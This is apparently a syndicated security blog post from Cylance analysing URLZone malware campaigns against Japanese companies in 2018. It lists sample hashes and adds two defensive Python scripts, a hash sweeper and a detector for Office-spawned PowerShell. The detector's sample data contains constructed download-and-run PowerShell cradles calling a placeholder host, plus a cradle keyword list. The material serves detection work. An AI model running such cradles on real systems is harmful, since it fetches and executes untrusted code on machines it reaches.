Threat Spotlight: URLZone Malware Campaigns Targeting Japan

The malware known as URLZone has plagued security professionals for nearly a decade, and now it is back for an encore performance in 2018. First detected as a banking Trojan in 2009, this malware has re-emerged in several recent threat campaigns.

URLZone underscores how many rudimentary malware infection strategies are as effective today as they were a decade ago. Victims of URLZone are first phished, then enticed to open a malicious attachment that downloads the malware payload.

In the most recent series of attacks targeting Japanese companies, the Trojan exhibited a variety of malicious behaviors, from process hollowing to downloading additional malware.

URLZone Analyzed

URLZone remains a persistent threat almost a decade after its first appearance. Its long track record of success makes it a favored tool among threat actors. Cylance observed active distribution campaigns involving this malware between February and April of 2018. The vast majority of these URLZone attacks targeted Japan.

We analyzed URLZone samples discovered from February to April, as shown in Table 1:

Date       SHA256
Feb. 2018  6722651E7C144658933C7EA6D1011D2662CDA29CF03A3737BCABD4B4ED54710D
           79051CFE2B37DDC439C18BC0C1856958DD026A7A6DD0A24DE4222D91DBFDA22C
           47F23E26E7258DAF6F4669F0183187C3435208675E64F1FA9521BEBED38A9D61
Mar. 2018  192DB4F6BCAE16A78C0C7544A3653A597C4CE05F8B8773F2553414C42BDDAA51
           03870D02ACC6E280B035822949DC6CC3B576CBC487497D0F358C3E05D969A23A
           6FD04B0C6EA295F5617F83896B8CE243909A77A9DA4E876C0F8E6E414BDEFFC3
           0881B599357FB4CEC8B477696C6B34645F36B48BC457DC7CE5E7978DA3C3BF10
Apr. 2018  81A9BEB4209250FE7169805E60AD1915BDAAF45926D0D82E820B36E0515F6831
           A041C5E65A76301656BE927D2BA92BC5A42567D7EE649E4A0C767D78254B29F7
           95B8F7277E3965872577AEBFC4D1A0A5738E6C814CBEB9AEF85B495B36DABAE8

Table 1: 10 URLZone samples detected during this campaign
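The hashes in Table 1 are the indicators most readers will actually act on. The following script is an added example for this post, not Cylance's tooling: it parses the table as printed (either a label-and-hash column layout or a label line followed by bare hash lines), normalises the hashes, and then sweeps either a directory tree or a list of hashes exported from an EDR or AV console against them. The directory argument and the "observed hashes" list are assumed inputs supplied by the reader.

```python
"""Turn the Table 1 hashes into a lookup set and sweep files or EDR hash exports against it.

Added example for this post; not Cylance's tooling. The directory to scan and the
"observed hashes" list are assumed inputs supplied by the reader.
"""
import hashlib
import os
import re
from typing import Dict, Iterable, Iterator, List, Tuple

# Table 1 from the post, as a label column followed by one SHA256 per line.
TABLE_1 = """
Feb. 2018  6722651E7C144658933C7EA6D1011D2662CDA29CF03A3737BCABD4B4ED54710D
           79051CFE2B37DDC439C18BC0C1856958DD026A7A6DD0A24DE4222D91DBFDA22C
           47F23E26E7258DAF6F4669F0183187C3435208675E64F1FA9521BEBED38A9D61
Mar. 2018  192DB4F6BCAE16A78C0C7544A3653A597C4CE05F8B8773F2553414C42BDDAA51
           03870D02ACC6E280B035822949DC6CC3B576CBC487497D0F358C3E05D969A23A
           6FD04B0C6EA295F5617F83896B8CE243909A77A9DA4E876C0F8E6E414BDEFFC3
           0881B599357FB4CEC8B477696C6B34645F36B48BC457DC7CE5E7978DA3C3BF10
Apr. 2018  81A9BEB4209250FE7169805E60AD1915BDAAF45926D0D82E820B36E0515F6831
           A041C5E65A76301656BE927D2BA92BC5A42567D7EE649E4A0C767D78254B29F7
           95B8F7277E3965872577AEBFC4D1A0A5738E6C814CBEB9AEF85B495B36DABAE8
"""

SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")


def parse_ioc_table(text: str) -> Dict[str, str]:
    """Map each SHA256 (lower-cased) to the month label that precedes it.

    Handles both layouts: label and hash on one line, or a label line followed
    by bare hash lines (the flattened form the page arrived in).
    """
    iocs: Dict[str, str] = {}
    label = "unknown"
    for line in text.splitlines():
        m = SHA256_RE.search(line)
        prefix = (line[:m.start()] if m else line).strip()
        if prefix:
            label = prefix  # any non-hash text starts a new date group
        if m:
            iocs[m.group(0).lower()] = label
    return iocs


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash in chunks so a multi-gigabyte file never has to sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def match_observed(observed: Iterable[str], iocs: Dict[str, str]) -> List[Tuple[str, str]]:
    """Match hashes exported from an EDR/AV console (any case, stray whitespace) against the IOCs."""
    hits = []
    for h in observed:
        norm = h.strip().lower()
        if norm in iocs:
            hits.append((norm, iocs[norm]))
    return hits


def scan_tree(root: str, iocs: Dict[str, str]) -> Iterator[Tuple[str, str, str]]:
    """Yield (path, sha256, label) for every readable file under root whose hash is an IOC."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # locked or unreadable file: skip it rather than abort the sweep
            if digest in iocs:
                yield path, digest, iocs[digest]


if __name__ == "__main__":
    import sys
    iocs = parse_ioc_table(TABLE_1)
    for path, digest, label in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".", iocs):
        print(f"MATCH {path}  {digest}  (sample first seen {label})")
```

Run it with a directory argument to sweep that tree; feed `match_observed` the hash column of an EDR export when you would rather not re-hash endpoints. Hash matching only catches these exact ten files, so treat a clean sweep as absence of known samples, not absence of URLZone.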

Figure 1 below shows, per day, the number of companies where URLZone was found, split between Japan (JP) and non-JP regions. We observed a spike on March 15, with eight victim companies. As the figure shows, URLZone mainly attacked Japanese companies during this period:

Figure 1: Japan (JP) and non-JP URLZone detections, February-April 2018

URLZone relies on phishing emails and malicious attachments to compromise a system. Macro code embedded in a weaponized MS Office document downloads and executes a malicious executable file, as shown in Figure 2 and Figure 3:

Figure 2: Encoded macro code

Figure 3: Deobfuscated macro code includes PowerShell Script
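The post does not reproduce the macro or the PowerShell it drops, so the following is an added example (not Cylance's code and not derived from the URLZone samples) of the detection a practitioner would write for the chain described: an Office process spawning PowerShell, optionally with a -EncodedCommand payload, whose decoded contents contain a download-and-run cradle. The pipe-separated event layout, the sample events, the cradle script and the host name are all constructed for the example. The one real detail it relies on is how -EncodedCommand works: base64 over the UTF-16LE bytes of the script, with -e and -ec accepted as abbreviations.

```python
"""Flag the macro-to-PowerShell chain in process-creation events and decode -EncodedCommand.

Added example for this post; not Cylance's code and not derived from the URLZone
macros. The event format, sample events, cradle script and host name are constructed.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Substrings that usually mark a download-and-run cradle (matched case-insensitively).
CRADLE_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "start-process", "invoke-expression", "iex ", "iex(")
# "-e<prefix> <base64>": powershell.exe accepts -e, -ec and any prefix of -EncodedCommand.
ENCODED_ARG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Produce what -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand (or an abbreviation), else None."""
    for m in ENCODED_ARG_RE.finditer(cmdline):
        flag = m.group(1).lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy, -Exec: not the encoded-command switch
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64/UTF-16: keep looking
    return None


def basename(path: str) -> str:
    """Last path component, lower-cased, for either Windows or POSIX separators."""
    return re.split(r"[\\/]", path.strip())[-1].lower()


def analyze_event(line: str) -> Optional[Dict[str, object]]:
    """Return an alert dict for an Office parent spawning PowerShell, else None.

    Constructed event layout: "parent_image|image|command_line".
    """
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    parent, image, cmdline = parts
    if basename(parent) not in OFFICE_PARENTS or basename(image) not in POWERSHELL_IMAGES:
        return None
    reasons = ["office_spawned_powershell"]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded_command")
    # Look for cradle markers in both the raw command line and the decoded script.
    haystack = (cmdline + " " + (decoded or "")).lower()
    if any(marker in haystack for marker in CRADLE_MARKERS):
        reasons.append("download_cradle")
    return {"parent": basename(parent), "image": basename(image),
            "reasons": reasons, "decoded": decoded}


def detect(events: List[str]) -> List[Dict[str, object]]:
    return [hit for hit in (analyze_event(e) for e in events) if hit is not None]


# Constructed download cradle standing in for the script the post's Figure 3 shows.
CONSTRUCTED_CRADLE = ("$u='http://payload.example/update.exe';$p=\"$env:TEMP\\upd.exe\";"
                      "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p")

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    # Word macro launching hidden, encoded PowerShell: the chain described in the post.
    "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -NoP -W Hidden -Exec Bypass -Enc " + encode_powershell(CONSTRUCTED_CRADLE),
    # Admin running PowerShell from Explorer: not matched by this rule.
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe Get-ChildItem C:\\Logs",
    # Excel launching a plaintext cradle: same chain without the encoding.
    "C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://payload.example/s.ps1')",
    # Word spawning its print helper: Office child, but not PowerShell.
    "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE|C:\\Windows\\splwow64.exe|splwow64.exe 12288",
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["parent"], "->", hit["image"], hit["reasons"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The parent/child pairing alone is a strong signal in most environments; the decoded script is what lets an analyst pull the download URL and dropped path straight out of the alert instead of re-running the macro in a sandbox. Keep the cradle markers as a scoring input rather than a hard requirement, since an actor can trivially split or obfuscate the cmdlet names.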


*** This is a Security Bloggers Network syndicated blog from Cylance Blog authored by Cylance Threat Guidance Team. Read the original post at: https://threatvector.cylance.com/en_us/home/threat-spotlight-urlzone-malware-campaigns-targeting-japan.html